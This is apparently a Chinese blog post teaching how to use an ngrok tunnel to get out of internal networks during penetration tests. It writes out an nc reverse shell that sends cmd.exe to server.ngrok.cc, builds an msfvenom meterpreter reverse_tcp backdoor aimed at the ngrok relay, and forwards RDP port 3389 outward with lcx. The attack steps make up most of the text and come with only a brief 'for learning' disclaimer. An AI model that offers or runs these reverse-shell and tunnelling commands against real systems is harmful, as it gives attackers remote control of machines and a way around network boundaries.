Ngrok内网穿透的几种利用

      其实这篇之前投稿了,不过版权在我这里,地址在这里:http://bobao.360.cn/learning/detail/3041.html

      Ngrok是这样介绍:一条命令解决的外网访问内网问题,本地WEB外网访问、本地开发微信、TCP端口转发。有tcp端口转发的功能,就尝试利用ngrok进行内网的穿透。

Ngrok的网址:http://www.ngrok.cc/。【这个不是官网地址,可以自己搭建ngrok】

     渗透的时候,有时候我们是内网,对方服务器也是内网,而没有vps怎么办,而又想实现端口转发,而这时候可以利用ngrok进行tcp的端口转发,实现内网的穿透。而且支持macLinuxwindows

     PS:本文具有一定的攻击性,只用于学习,以下实验都是在虚拟机上面实现。

  首先先到http://www.ngrok.cc/login这个平台登陆进行注册,然后就可以添加自己本地需要转发的地址和接收的端口。


  

  选择需要的服务,填上外网需要接收的端口,和转发到本地的端口和地址。


1.进行nc的反弹

 192.168.1.100kali上面的ip,先选择对应的Linux版本,然后在Linux上面执行这句命令。

 ./sunny clientid 客户端id

当看到这个界面的时候,就可以进行转发了。


在要接收的Linux机器上面执行这个命令:

nc vv l p 12345


在内网的机器当中执行这个命令:

nc -vv server.ngrok.cc 11226 -e c:\Windows\System32\cmd.exe


成功接收,有点意思吧。

2.msf的反弹

 

   当没有一台外网的vps的时候,msf的利用是比较难的。但利用这个可以实现端口的转发。就可以实现即使在内网中也可以玩转msf。用法如下:

   先启动服务,kali上面执行这个命令:./sunny clientid 客户端id。


这里实现的是由外网的端口转发到内网的12345端口当中:server.ngrok.cc(119.28.62.35):11226->192.168.1.102kaliip:12345.

先生成一个后门:msfvenom -a x86 --platform win -p windows/meterpreter/reverse_tcp LHOST=119.28.62.35 LPORT=11226 -f exe x> back.exe。然后把后门放在内网的机器上面执行。在kali上面监听的结果:


成功反弹。

3.lcx实现的转发

  这次是在windows上面启动ngrok,所以选择相应的版本:

  先执行《Sunny-Ngrok启动工具.bat》,再输入客户端id


当看到以下界面就说明成功运行:


首先本地进行监听:

lcx -listen 12345 33891


然后将内网的3389转发出去,执行以下命令:

lcx.exe -slave server.ngrok.cc 11226 127.0.0.1 3389



然后用访问本地33891端口进行连接:


成功连接的机器。



   除了以上的方法,因为实现了端口转发,想利用的方式还是很多的,利用ssh端口的利用等。这里就不举例子了,自己可以尝试实现。
发布了20 篇原创文章 · 获赞 11 · 访问量 13万+
展开阅读全文

没有更多推荐了,返回首页

©️2019 CSDN 皮肤主题: 编程工作室 设计师: CSDN官方博客

分享到微信朋友圈

×

扫一扫,手机浏览